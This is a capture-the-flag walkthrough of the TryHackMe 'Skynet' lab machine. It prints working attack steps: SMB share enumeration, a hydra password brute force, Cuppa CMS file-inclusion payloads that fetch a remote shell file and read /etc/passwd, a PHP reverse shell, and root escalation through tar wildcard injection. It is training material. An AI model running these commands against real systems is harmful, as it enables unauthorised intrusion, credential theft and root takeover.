SkyNet | Advanced Exploitation | TryHackMe

In this room, we are going to exploit a vulnerable Terminator themed Linux machine.

To begin, we will start by visiting the website url and learn more about the website. In this case, the home page is a search portal, this means we have to look for open ports and if we do not get any intresting information, we do an enumeration for hidden directories.

The Nmap results shows smb ports are open and first step is to try and enumerate for the samba shares.

smbmap -H ip

This gives us 3 samba shares: print$, anonymous, milesdyson

In this case, we are intrested in milesdyson and anonymous.

lets try login into them

smbclient //10.10.188.144/anonymous

Bingo!, we are in. Lets look around.

We get two files, ‘attention.txt & logs’, lets have a look.

Attention.txt is a reminder to user Miles Dyson to change their password whereas log1.txt seems to be some sort of stored password files. Now we need to find the hidden login page and use hydra on user miles dyson to try and crack his password.

Luckily, from the gobuster directory enumeration, we see an interesting directory ‘squirrelmail’ that leads us to a login page.

hydra -l milesdyson -P /root/log1.txt 10.10.188.144 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or Password" -t 64

We have the username and password. milesdyson : cyborg007haloterminator , we can attempt to log in.

We are in and we can see milesdyson’s changed password. Can we can login to milesdyson smbclient and look for intresting files.

smbclient //10.10.253.120/milesdyson -U milesdyson

We can see from his notes directory, a text file by the name important.txt stands out.

There is a subdirectory that seems to be in beta phase. /45kra24zxs28v3yd

A visit to the newly discovered directory leads us to somekind of an image. Usually, developers use this sort of tactics to hide important information. Lets use gobuster to enumerate further.

We find another sub-directory named administrator,

Trying to login with the previous passwords renders futile. So lets try checking whether there is an exploit for cuppa cms.

$searchsploit cuppa cms
$searchsploit -x 25971.txt

We see that cuppa cms is vulnerable to PHP code injection, lets cat the usage instruction

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Time to configure a php reverse shell. LPORT=4444 , LHOST=10.10.292.920

start your web server as well as your netcat listener on the set port.

Once everything is set. visit the website url as shows in the cuppa cms exploit usage , feeding it to your attacker ip/payload.

Hurrah, you get your initial shell as www-data, but it needs to be stabilised.

python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl z

stty raw -echo; fg

export TERM=xterm

With the shell stabilised, you can manouver your way to some directories. But this is not enough as we need to escalate to root user.

To achieve that, lets export linpeas to our users machine and see what it gives us.

Intrestingly, we can see a program ‘backup.sh’ running in the home/milesdyson/backups every minute.

lets cat it out and see what it contains.

After every minute, backup.sh runs as root and utilises the tar exploit.

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
www-data@skynet:/home/milesdyson/backups$ 

Lets visit https://gtfobins.github.io/ and find which tar binaries we can use to abuse the system.

Another thing to note is that we cannot run in this current directory, so we will have to cd to /var/www/html as seen from the above command line.

Once in the directory, we can change the /bin/bash to an executable and this way it can run as root once the tar binary is set. This will be done as shown below.

printf '#!/bin/bash\n chmod +s /bin/bash' >
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

/bin/bash -p

and now we are root…